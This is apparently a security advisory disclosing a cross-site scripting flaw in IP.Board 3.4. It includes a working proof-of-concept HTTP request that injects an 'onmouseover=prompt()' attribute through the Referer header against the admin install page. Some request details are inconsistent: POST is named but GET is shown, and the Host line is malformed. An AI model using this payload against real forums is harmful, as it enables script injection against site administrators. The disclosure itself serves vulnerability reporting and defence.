+-------------------------------------------------------------------- + + IP.Board 3.4 cross-site scripting in Referer header + +-------------------------------------------------------------------- + vendor site........: http://www.invisionpower.com + Affected Software .: IP.Board 3.4 + Class .............: XSS + Risk ..............: high + Found by ..........: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ] + Facebook .: https://www.facebook.com/runvirus + Contact ...........: stormhacker[at]hotmail[.]com +-------------------------------------------------------------------- [X] Affected Products: ========================= test on IP.Board 3.4.6 & IP.Board 3.4.4 maybe work under 3.4 [X] About the application: ========================= IP.Board is the leading solution for creating an engaging discussion forum on the web. [X] Vulnerability Description: =============================== The attack is going with above-mentioned conditions. It's needed to send POST request to http://path_forum/admin/install/index.php with setting of Referer header. Referer: 1" onmouseover=prompt(947671) bad=" [X] Exploit : =============================== GET /admin/install/index.php HTTP/1.1 Referer: 1" onmouseover=prompt(11111111) bad=" User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Cookie: Host: localhost/admin/install/index.php Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */* [X] Video proof : =============================== https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be +-------------------------------------------------------------------- + + Greets: + || rUnViRuS || - || Providor || +-------------------------[ W D T ]----------------------------------
